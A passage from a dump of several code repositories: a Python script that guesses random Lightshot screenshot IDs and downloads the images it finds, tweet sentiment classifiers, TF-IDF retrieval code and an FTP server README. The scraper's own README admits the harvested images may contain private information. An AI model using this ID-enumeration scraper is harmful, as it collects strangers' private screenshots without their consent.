"text": "#! /usr/bin/env python\n\n\"\"\"\nGenerates random links based on a prefix.\nusage: ./rp.py -p <f3> -r 200 \n\"\"\"\n\nimport urllib2\nfrom urllib2 import Request\nimport re\nimport time\nimport signal\nimport sys\nimport os\nimport random\nimport string\nimport urlparse\nimport argparse\nfrom msvcrt import putch, getch\n\n# Detects Ctrl+C command\ndef signal_handler(signal, frame):\n\tprint('[*] Ctrl+C detected! Aborting...')\n\tsys.exit(0)\n\n# Creates random url\ndef randomstring(pref):\n\treturn 'http://prnt.sc/' + pref + ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(4))\n\n# Creates folder to save images\nif not os.path.isdir('images-light'):\n os.makedirs('images-light')\n \ndef main():\n\tparser = argparse.ArgumentParser(description=\"Get random images from lightshot\", prog=\"rp\")\n\tparser.add_argument(\"-p\", dest=\"prefix\", help=\"Prefix to use\", required=True)\n\tparser.add_argument(\"-r\", dest=\"results\", help=\"Max number of results\", required=True, type=int)\n\toptions = parser.parse_args()\n\tprint \"[*] Finding Images...\"\n\ta = range(0, options.results)\n\tfor i in a:\n\t\tsignal.signal(signal.SIGINT, signal_handler)\n\t\tlink = randomstring(options.prefix)\n\t\tfile_name= link.split(\"/\")[-1]\n\t\topener = urllib2.build_opener()\n\t\topener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')]\n\t\tresponse = opener.open(link)\n\t\thtml = response.read()\n\t\ttime.sleep( 1 )\n\t\tm = re.search(r\"<meta property=\\\"og:image\\\" content=\\\"(.+).png\\\"/>\", html)\n\t\tprint('[*] Trying id: ' + link)\n\t\tif m:\n\t\t\ttry:\n\t\t\t\tfinal_link = m.group(1) + '.png'\n\t\t\t\topener_file = urllib2.build_opener()\n\t\t\t\topener_file.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')]\n\t\t\t\tresponse_file = opener_file.open(final_link)\n\t\t\t\twith open('images-light\\\\' + file_name + '.png', 'wb') as output:\n\t\t\t\t\toutput.write(response_file.read())\n\t\t\t\tprint('\tFound image with id ' + file_name)\n\t\t\texcept ValueError:\n\t\t\t\tprint('\tError downloading image with id ' + file_name)\t\t\n\t\telse:\n\t\t\tprint('\tNo image with id ' + file_name)\t\n\tprint(\"[*] Download complete!\")\nmain()"
},
{
"alpha_fraction": 0.7123894095420837,
"alphanum_fraction": 0.721238911151886,
"avg_line_length": 34.68421173095703,
"blob_id": "384335df8e6a1eb360b9be97317ff845f34dc56d",
"content_id": "986ece640ae84110d1c614fbeea753122c7f068e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 678,
"license_type": "permissive",
"max_line_length": 199,
"num_lines": 19,
"path": "/README.md",
"repo_name": "miltinhoc/RP-Python",
"src_encoding": "UTF-8",
"text": "# RP-Python\nFinds photos uploaded by people to a specific Host. This is an simpler and open-source version of [RP](https://github.com/miltinhoc/RP)\n\n## Usage example:\n```\nrp.py -p m3 -r 200\n```\n\n## Help\n```\narguments:\n-p PREFIX A prefix (2 characters) used to find images (example: c4)\n-r MAX_SEARCH Maximum limit of search results\n```\n\n**Prefix:** Depending on the prefix used, you may find Images that are older, newer or find none at all.\n\n## Disclaimer:\nThe pictures found by the program may have content of adult nature or contain private information. I am not responsible for such pictures or the malicious use of the private information you may find.\n"
}
] | 2 |
AmitPoonia/tweet-sentiments | https://github.com/AmitPoonia/tweet-sentiments | b8afe9ee8bc32db020069a4bd5b07a4592d516ce | dd73405ce16569eeaa2e04db4a4915ba61142513 | ebffc69dcd34f59e08b53b64abcc12068128b298 | refs/heads/master | 2022-09-28T19:44:50.706842 | 2015-12-04T16:38:14 | 2015-12-04T16:38:14 | 47,397,252 | 0 | 0 | null | 2015-12-04T10:24:18 | 2015-12-04T10:31:00 | 2022-09-23T20:44:55 | Python | [
{
"alpha_fraction": 0.7096273303031921,
"alphanum_fraction": 0.7298136353492737,
"avg_line_length": 31.200000762939453,
"blob_id": "970e545ec5963c2755e7f0cbe6b0dc094f570688",
"content_id": "21e172fa52a4b57f8d189c8bbf5bc76e2ca50495",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 20,
"path": "/joint_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\n\n\nX_w2v = np.load('models/X_all_w2v')\nX_lsa = np.load('models/X_all_lsa')\ny = np.load('models/y_all_w2v')\n\nX = np.hstack((X_w2v,X_lsa))\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.6486919522285461,
"alphanum_fraction": 0.6620395183563232,
"avg_line_length": 26.955223083496094,
"blob_id": "559c02798ccea80379df453533ed1825aa539a00",
"content_id": "2c6aa82c96b587192b1407462e86a338db68f89d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 67,
"path": "/word2vec_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport sys\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\n\nsys.path.append('models/word2vec_twitter_model')\nfrom word2vecReader import Word2Vec\n\nmodel_path = 'models/word2vec_twitter_model/word2vec_twitter_model.bin'\n\nprint 'Loading the model...'\nmodel = Word2Vec.load_word2vec_format(model_path, binary=True)\n\ndef preprocess(text):\n special_chars = \"\"\".,?!:;(){}[]#\"\"\"\n for c in special_chars:\n text = text.replace(c, ' %s '%c)\n words = text.lower().split()\n\n return words\n\ndef get_vector(text, model=model, size=400):\n words = preprocess(text)\n vec = np.zeros(size)\n count = 0.\n for word in words:\n try:\n vec += model[word]\n count += 1.\n except KeyError:\n continue\n if count != 0:\n vec /= count\n return vec\n\nX_pos = open('data/positive-all','r').readlines()\nX_neu = open('data/neutral-all','r').readlines()\nX_neg = open('data/negative-all','r').readlines()\n\n\nX_pos_vec = np.array(map(get_vector, X_pos))\nX_neu_vec = np.array(map(get_vector, X_neu))\nX_neg_vec = np.array(map(get_vector, X_neg))\n\n\ny_pos_vec = np.ones(len(X_pos_vec))\ny_neu_vec = np.zeros(len(X_neu_vec))\ny_neg_vec = np.full(len(X_neg_vec),-1)\n\nX_all = np.concatenate((X_pos_vec, X_neu_vec, X_neg_vec))\ny_all = np.concatenate((y_pos_vec, y_neu_vec, y_neg_vec))\n\nX_all = scale(X_all)\n\nX_all.dump('models/X_all_w2v')\ny_all.dump('models/y_all_w2v')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.6788889169692993,
"alphanum_fraction": 0.6877777576446533,
"avg_line_length": 26.69230842590332,
"blob_id": "a10fc856786eb86cc3f40e3bfa96a980c824baa9",
"content_id": "fd2a74801173614a758ca7e941472d13f28173ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1800,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 65,
"path": "/lsa_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport sys\nimport os\nimport re\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\nfrom gensim import corpora, models\n\n\ndef wordlist(text, remove_stopwords=True):\n special_chars = \"\"\".,?!:;(){}[]\"\"\"\n for c in special_chars:\n text = text.replace(c, ' %s '%c)\n\n words = text.lower().split()\n return words\n\ndef preprocess(texts):\n list_of_lists = map(wordlist, texts)\n return list_of_lists\n\ndef remove_tuples(tuples_list):\n tupleless = [tup[1] for tup in tuples_list]\n return tupleless\n\n\nnum_topics = 100\n\nX_pos = open(\"data/positive-all\",\"r\").readlines()\nX_neu = open(\"data/neutral-all\",\"r\").readlines()\nX_neg = open(\"data/negative-all\",\"r\").readlines()\n\ny_pos_vec = np.ones(len(X_pos))\ny_neu_vec = np.zeros(len(X_neu))\ny_neg_vec = np.full(len(X_neg),-1)\n\n\ny_all = np.concatenate((y_pos_vec, y_neu_vec, y_neg_vec))\n\nX_processed = preprocess(X_pos+X_neu+X_neg)\ndictionary = corpora.Dictionary(X_processed)\ncorpus = map(dictionary.doc2bow, X_processed)\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=num_topics)\n\nX_all = np.zeros((len(X_processed), num_topics))\nX_all_ = map(remove_tuples, lsi[corpus])\n\nfor i,row in enumerate(X_all_):\n for j,col in enumerate(X_all_[i]):\n X_all[i][j] = X_all_[i][j]\n\n\nX_all = scale(X_all)\n\nX_all.dump('models/X_all_lsa')\ny_all.dump('models/y_all_lsa')\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.763610303401947,
"alphanum_fraction": 0.7750716209411621,
"avg_line_length": 21.516128540039062,
"blob_id": "9312248953b47e231b1ff59246fa2d3014a3480e",
"content_id": "1337104c4318b21052dc922098464416dca12484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 698,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 31,
"path": "/README.md",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "Twitter Sentiment Analysis\n\n\nThere are three separate scripts:\n\n1) word2vec_sentiment,py uses a pre-trained word2vec model \n\n2) lsa_sentiment.py uses simple bag-of-words model with LSA\n\n3) joint_sentiments.py combines both 1 and 2\n\n\nNotes:\n\n\t- Removing stop-words didn't improve results much\n\n\t- Combining two models improved results slightly but\n\t\tnothing radical\n\n\t- The results are little skewed since no. of samples \n\t\tfor all three classes are not equal.\n\n\n\nAdditional Requirements:\n\n\nThe pre-trained word2vec model is available to download at below link with relevant \nliterature, and once it downloaded it must be placed in 'models/'' sub-directory.\n\n\thttp://www.fredericgodin.com/software/\n"
},
{
"alpha_fraction": 0.4931972920894623,
"alphanum_fraction": 0.6916099786758423,
"avg_line_length": 15.333333015441895,
"blob_id": "529968550d49739fc3cb5a6098c978646aea8549",
"content_id": "c43d2802dd50fd443b1699bee3896fe989ce6be2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 54,
"path": "/requirements.txt",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "Cheetah==2.4.4\nCython==0.22\nKeras==0.3.0\nLandscape-Client==14.01\nPAM==0.4.2\nPyYAML==3.10\nPyste==0.9.10\nTheano==0.7.0\nTwisted-Core==13.2.0\nTwisted-Names==13.2.0\nTwisted-Web==13.2.0\napt-xapian-index==0.45\nargparse==1.2.1\nchardet==2.0.1\ncloud-init==0.7.5\ncolorama==0.2.5\nconfigobj==4.7.2\ndecorator==3.4.0\ngyp==0.1\nh5py==2.4.0\nhtml5lib==0.999\nipython==2.3.1\njsonpatch==1.3\njsonpointer==1.0\nleveldb==0.193\nmatplotlib==1.4.2\nmock==1.0.1\nner==0.1\nnetworkx==1.9.1\nnltk==3.1\nnose==1.3.4\nnumpy==1.8.2\noauth==1.0.1\npandas==0.15.2\nprettytable==0.7.2\nprotobuf==2.6.1\npyOpenSSL==0.13\npycurl==7.19.3\npyparsing==2.0.3\npyserial==2.6\npython-apt==0.9.3.5\npython-dateutil==1.5\npython-debian==0.1.21-nmu2ubuntu2\npython-gflags==2.0\npytz==2014.10\nrequests==2.2.1\nscikit-image==0.10.1\nscikit-learn==0.15.2\nsix==1.5.2\nssh-import-id==3.21\nthrift-py==0.9.0\nurllib3==1.7.1\nwsgiref==0.1.2\nzope.interface==4.0.5\n"
}
] | 5 |
ullayne02/API | https://github.com/ullayne02/API | 022346ba5bc368b90dcf2ac68c1e33c61a4b5093 | 4b5764b2b5cc68db20281905e1e4cd624b424ed3 | ff83e84cce44ca23c5acae1a4bb1ceec6cc05033 | refs/heads/master | 2021-08-28T02:27:42.718246 | 2017-11-10T23:20:43 | 2017-11-10T23:20:43 | 110,033,825 | 0 | 0 | null | 2017-11-08T21:42:35 | 2017-11-08T21:42:38 | 2017-12-11T03:29:31 | Python | [
{
"alpha_fraction": 0.6985491514205933,
"alphanum_fraction": 0.7485222816467285,
"avg_line_length": 37,
"blob_id": "614173893fb5cfa827f403f74006d08d6de24d41",
"content_id": "5f1f4f23f5ef6389674ba6f0929164bb45abcb47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1861,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 49,
"path": "/untagged/ranker/ranking.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from ..representer import *\nimport math\n\n# function that returns the tdidf weight of a document\ndef weightFileTDIDF(word, text, invertedFile, fileTotalNumber, fileRecoveredNumber):\n tf = len(invertedFile[\"invertedFile\"].get(word,[]))/float(invertedFile[\"size\"])\n idf = math.log(fileTotalNumber/fileRecoveredNumber,10);\n tfidf = tf*idf\n return tfidf\n \n# function that returns the tdidf weight of a query\ndef weightQueryTDIDF(word, query, fileTotalNumber, fileRecoveredNumber):\n tf = query.count(word)/float(len(query))\n idf = math.log(fileTotalNumber/fileRecoveredNumber,10);\n tfidf = tf*idf\n return tfidf\n\n# function that eliminate the duplicates of a query\ndef removeDuplicates(query):\n result = []\n for q in query:\n if q not in result:\n result.append(q)\n return result\n\n# examples to test functions' correctness\n\nword1 = \"cat\"\nword2 = \"bad\"\ntext = \"cat is so cute. cat is bad.\"\n# 012345678901234567890123456\ninvertedFile = {\"size\": 4, \"invertedFile\": {\"bad\":[23],\"cat\":[0,16],\"cute\":[10]}}\nfileTotalNumber = 200\nfileRecoveredNumber = 50\n\nquery = [\"cat\",\"bad\",\"cat\",\"bad\"]\n\ntext2 = \"cat is so cute. cat is sad.\"\n# 012345678901234567890123456\ninvertedFile2 = {\"size\": 4, \"invertedFile\": {\"cat\":[0,16],\"cute\":[10],\"sad\":[23]}}\n\n\nprint (weightFileTDIDF(word1,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word2,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\n#print (vectorFile(query,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word1,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word2,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\n#print (vectorFile(query,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\n#print (vectorQuery(query,fileTotalNumber,fileRecoveredNumber))"
},
{
"alpha_fraction": 0.8125,
"alphanum_fraction": 0.8125,
"avg_line_length": 31,
"blob_id": "8de9ad72062e32ecd7c1d5e189d741b2762b2585",
"content_id": "6cac80ce68daae761c6730ad6db5f4bc067c92c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 1,
"path": "/untagged/representer/__init__.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from .vectorSpaceModel import *\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.5090909004211426,
"avg_line_length": 35,
"blob_id": "29a7671e2bdd422416f1e64d969cc3ab92d0c20e",
"content_id": "11728e77fa0efeea617b47593b9240e98bfddab7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 3,
"path": "/test.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "\nimport json\ndata1 = ([1,2,3], \"id\")\ndata = {\"id\": 4, \"invertedFile\": {\"bad\":[23],\"cat\":[0,16],\"cute\":[10]}}\n\n"
},
{
"alpha_fraction": 0.6697174906730652,
"alphanum_fraction": 0.6995622515678406,
"avg_line_length": 36.50746154785156,
"blob_id": "c7c404ecb63c11258f1d632bda96baf2a9594cde",
"content_id": "140353c0ca8be491fe693a73d43c2a78ea293523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 67,
"path": "/untagged/representer/vectorSpaceModel.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from ..ranker import *\nimport math\nimport json\n# function that returns a vector of a document based on a query \n# a query with duplicate elements will remove the duplicates to build the vector\n# example query = [\"cat\",\"bad\",\"cat\",\"bad\"] will return a vector with two elements like [0.30102999566398114, 0.15051499783199057]\n# because the second \"cat\" and the second \"bad\" will be eliminated\ndef vectorFile(query, text, invertedFile, fileTotalNumber, fileRecoveredNumber):\n query = ranking.removeDuplicates(query)\n for q in query:\n result.append(ranking.weightFileTDIDF(q, text, invertedFile, fileTotalNumber, fileRecoveredNumber))\n return result\n \n# function that returns a vector of a query\n# a query with duplicate elements will remove the duplicates to build the vector\n# example query = [\"cat\",\"bad\",\"cat\",\"bad\"] will return a vector with two elements like [0.30102999566398114, 0.30102999566398114]\n# because the second \"cat\" and the second \"bad\" will be eliminated \ndef vectorQuery(query, fileTotalNumber, fileRecoveredNumber):\n queryM = ranking.removeDuplicates(query)\n for q in queryM:\n result.append(ranking.weightQueryTDIDF(q, query, fileTotalNumber, fileRecoveredNumber))\n return result\n\n\n#this function recives a vector \n#return the vector divided by its norm\ndef cossine (document, query):\n normalizedDoc = normalize(document)\n normalizedQuery = normalize(query)\n for i in range (2):\n result += normalizedDoc[i]*normalizedQuery[i]\n return result\n \n# function that return the size of the vector \ndef norma (vector): \n norma = [x**2 for x in vector]\n norma = sum(norma)\n norma = math.sqrt(norma)\n return norma\n\n# function that return the correspondent vector that has the norma equals to 1\ndef normalize(vector):\n normal = norma(vector)\n result = [x/normal for x in vector]\n return result\n\n# function that gives the similareties between the query and the documents using the cossine as base \ndef similarities (query, documents):\n result = [cossine(query, x) for x in documents]\n return result\n \ndef inverted_file (file, id):\n inv_fil = {}\n result = {}\n file = file.split()\n voc = removeDuplicates(file)\n size = len(file)\n for q in voc:\n result[q] = []\n for q in voc:\n for i in range(size):\n if q == file[i]:\n result[q].append(i)\n inv_fil[id] = result\n with open('data.json', 'a') as outfile:\n json.dump(inv_fil, outfile)\n return inv_fil\n"
},
{
"alpha_fraction": 0.4369521141052246,
"alphanum_fraction": 0.44436952471733093,
"avg_line_length": 23.71666717529297,
"blob_id": "20a4325bee3658aad691380084c75ccb3a9a294f",
"content_id": "e552bf0f76a5a502a7146d1824519ed4c7d0230e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1483,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 60,
"path": "/untagged/lexer/thesaurus.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "import json\n\n\n_ls = []\n_la = []\n\ndef load(word):\n c = word[0]\n path = \"lexer/thesaurus/thesaurus_update/\" + c + \".json\"\n with open(path, 'r') as fileIn:\n syn = json.load(fileIn)\n fileIn.close()\n return syn\n\ndef synonyms(word):\n global _ls\n _ls = []\n \n syn = load(word)\n dWord = syn.get(word)\n if dWord is not None:\n ctxKeys = dWord.keys()\n relev = 3\n while relev > 0:\n for key in ctxKeys:\n dCtx = dWord.get(key)\n if isinstance(dCtx,dict):\n dSyn = dCtx.get(\"synonyms\")\n if dSyn.has_key(str(relev)):\n _ls.extend(dSyn.get(str(relev)))\n else:\n _ls.extend(synonyms(dCtx.encode(\"utf-8\")))\n relev = 0\n relev -= 1\n \n return _ls\n\n\ndef antonyms(word):\n global _la\n _la = []\n \n syn = load(word)\n dWord = syn.get(word)\n if dWord is not None:\n ctxKeys = dWord.keys()\n relev = 3\n while relev > 0:\n for key in ctxKeys:\n dCtx = dWord.get(key)\n if isinstance(dCtx,dict):\n dSyn = dCtx.get(\"antonyms\")\n if dSyn.has_key(str(relev)):\n _la.extend(dSyn.get(str(relev)))\n else:\n _la.extend(antonyms(dCtx.encode(\"utf-8\")))\n relev = 0\n relev -= 1\n \n return _la\n"
},
{
"alpha_fraction": 0.4029850661754608,
"alphanum_fraction": 0.4029850661754608,
"avg_line_length": 28.83333396911621,
"blob_id": "aabde20dfe20cfb50d1006792ce2b7719edb2bf3",
"content_id": "34ce600cf1b8a7b20a17a19dbb379de5871f35ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/untagged/lexer/normalization.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "def tokenize(text):\n tokens = text.split()\n return tokens\n\ndef normalize(text):\n # $, %, #, &, @\n chars = ['!', '\"', '(', ')', '*', '+', ',', '-', '/', \\\n ':', ';', '<', '=', '>', '?', '[', ']', '^', \\\n '_', '`', '{', '|', '}', '~', '\\\\']\n for char in chars:\n text = text.replace(char, ' ')\n text = text.replace('.', '')\n text = text.replace(\"'\", '')\n text = text.lower()\n return text\n\ndef lemmatize(text):\n print('Still not implemented, important to semantic analasys! ;-)')"
},
{
"alpha_fraction": 0.624535322189331,
"alphanum_fraction": 0.6468401551246643,
"avg_line_length": 19.69230842590332,
"blob_id": "116a9aa45c7aaeb96d7929b93d58bbb1056f162e",
"content_id": "bc30fb4bdafcb8a39be45f9700fffe327d9d267e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/main.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from untagged.representer import vectorSpaceModel\n\n\ndef main(): \n string = \"abc a b c d e f\"\n string2 = \"osdj slajd slkj\"\n #vectorSpaceModel.inverted_file(string, 10)\n vectorSpaceModel.inverted_file(string2, 20)\n \n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 22,
"blob_id": "3f433db82cea8f467fed972decadd5e3c043f870",
"content_id": "8c1daf2d8483ec6e23ac5a6a8a3e0e4895b0f583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/untagged/ranker/__init__.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from .ranking import *\n"
},
{
"alpha_fraction": 0.3876941502094269,
"alphanum_fraction": 0.40442055463790894,
"avg_line_length": 30.58490562438965,
"blob_id": "a64d5fa43d0ab5643c80c0dc424359a86ab7702c",
"content_id": "4bbe383f5887725048798045efb3efa35af35098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1674,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 53,
"path": "/untagged/lexer/mounter.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "import json\n\nls = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w', 'y', 'z']\n\nfor carac in ls:\n\n with open(\"lexer/thesaurus/\"+carac+\".json\", 'r') as fileIn:\n thesaurus = json.load(fileIn)\n fileIn.close()\n\n aux = {}\n aux1 = {}\n aux2 = {}\n aux3 = {}\n aux4 = {}\n\n keysWords= thesaurus.keys()\n \n for key in keysWords:\n dictWord = thesaurus.get(key)\n ctxKeys = dictWord.keys()\n \n for key1 in ctxKeys:\n if isinstance(dictWord, dict):\n dictCtx = dictWord.get(key1)\n \n if isinstance(dictCtx, dict): \n ctxKeys = dictCtx.keys()\n \n for key2 in ctxKeys:\n synonyms = dictCtx[key2]\n synonymsKeys = synonyms.keys()\n \n for key3 in synonymsKeys:\n i = synonyms.get(key3)\n aux4.setdefault(i, [])\n aux4[i].append(key3)\n aux3.update({key2:aux4})\n aux4 = {}\n synonyms.clear()\n #print aux2\n aux2.update({key1:aux3})\n aux3 = {}\n dictCtx.clear()\n else:\n aux2.update({key1:dictCtx})\n aux1.update({key:aux2})\n aux2 = {}\n dictWord.clear()\n \n with open(\"lexer/thesaurus/thesaurus_update/\"+carac+\".json\", 'w') as fileOut:\n json.dump(aux1, fileOut)\n fileOut.close()\n"
}
] | 9 |
yyyhhhrrr/ftpserver | https://github.com/yyyhhhrrr/ftpserver | 5220df5d77f950e3ffac74d52b72dbfd00f880a5 | c17c8b3f82353b7b70b916874f359bd9998154a1 | 4204e502c258e1e6f1390239e98220da750ca4a3 | refs/heads/master | 2020-04-06T21:30:06.227132 | 2018-11-16T03:06:30 | 2018-11-16T03:06:30 | 157,805,333 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.35429343581199646,
"alphanum_fraction": 0.3718729019165039,
"avg_line_length": 25.410715103149414,
"blob_id": "f84177c108248f37ba6de93d5c88916107bfa133",
"content_id": "d9fbc790d1350bb0e3bd9cc03a920d30b9c0e902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1819,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 56,
"path": "/README.txt",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "基于socket的多用户在线的轻量级ftp server:\n功能:1.用户加密认证\n 2.允许多用户同时登陆\n 3.每个用户都有自己的家目录,且只能访问家目录(权限控制)\n 4.允许用户在ftp server 上切换目录\n 6.允许用户查看当前下目录的文件\n 7.支持上传、下载,保证文件一致性\n 8.文件传输过程显示进度条\n\n|-- ftpserver 轻量级ftp server\n |-- ftp_client ftp客户端(windows 或linux)\n |-- a.txt\n |-- b.txt\n |-- ftp_client.py ftp 主程序\n |-- show_process.py 显示进度条的功能类\n |-- test.py\n |-- __init__.py\n |-- ftp_server ftp 服务端(linux)\n |-- __init__.py\n |-- bin\n | |-- ftp_server.py 启动程序\n | |-- __init__.py\n |-- conf\n | |-- setting.py 配置文件\n | |-- __init__.py\n | |-- __pycache__\n | | |-- setting.cpython-37.pyc\n | | |-- __init__.cpython-37.pyc\n |-- core 核心功能\n | |-- b.txt\n | |-- main.py 程序主入口\n | |-- __init__.py\n | |-- __pycache__\n | | |-- main.cpython-37.pyc\n | | |-- __init__.cpython-37.pyc\n |-- data\n | |-- create_data.py 生成用户json数据\n | |-- yang.txt 用户json数据\n | |-- yhr123.txt\n |-- log\n | |-- __init__.py\n |-- yang 用户家目录\n | |-- a.txt.new\n | |-- b.txt\n | |-- b.txt.new\n | |-- a\n | | |-- 1.txt\n | |-- b\n | | |-- 2.txt\n |-- yhr123 用户家目录\n | |-- 3.txt\n | |-- __init__.py\n | |-- a\n | | |-- 1.txt\n | |-- b\n | | |-- 2.txt\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.6878048777580261,
"avg_line_length": 14.692307472229004,
"blob_id": "9661c79c9e2de5f55b308de48cafe1145a5ed748",
"content_id": "fef632c62f99e373a886042643ee31a5f554c386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 13,
"path": "/ftp_server/bin/ftp_server.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport sys\nfrom conf import setting\nfrom core import main\nBASE_DIR=setting.BASE_DIR\n\nsys.path.append(BASE_DIR)\n\nif __name__=='__main__':\n main.run()\n\n"
},
{
"alpha_fraction": 0.6029411554336548,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 23.25,
"blob_id": "07eea750d5e001aa0bb6efe62774b96e4c00a955",
"content_id": "3996ea8d8d1cb6a458042d78ea0e88ceea19d7e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/ftp_client/test.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
